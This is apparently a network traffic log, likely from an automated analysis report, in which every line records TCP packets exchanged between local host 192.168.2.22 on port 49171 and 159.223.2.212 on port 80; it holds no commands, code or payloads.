Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
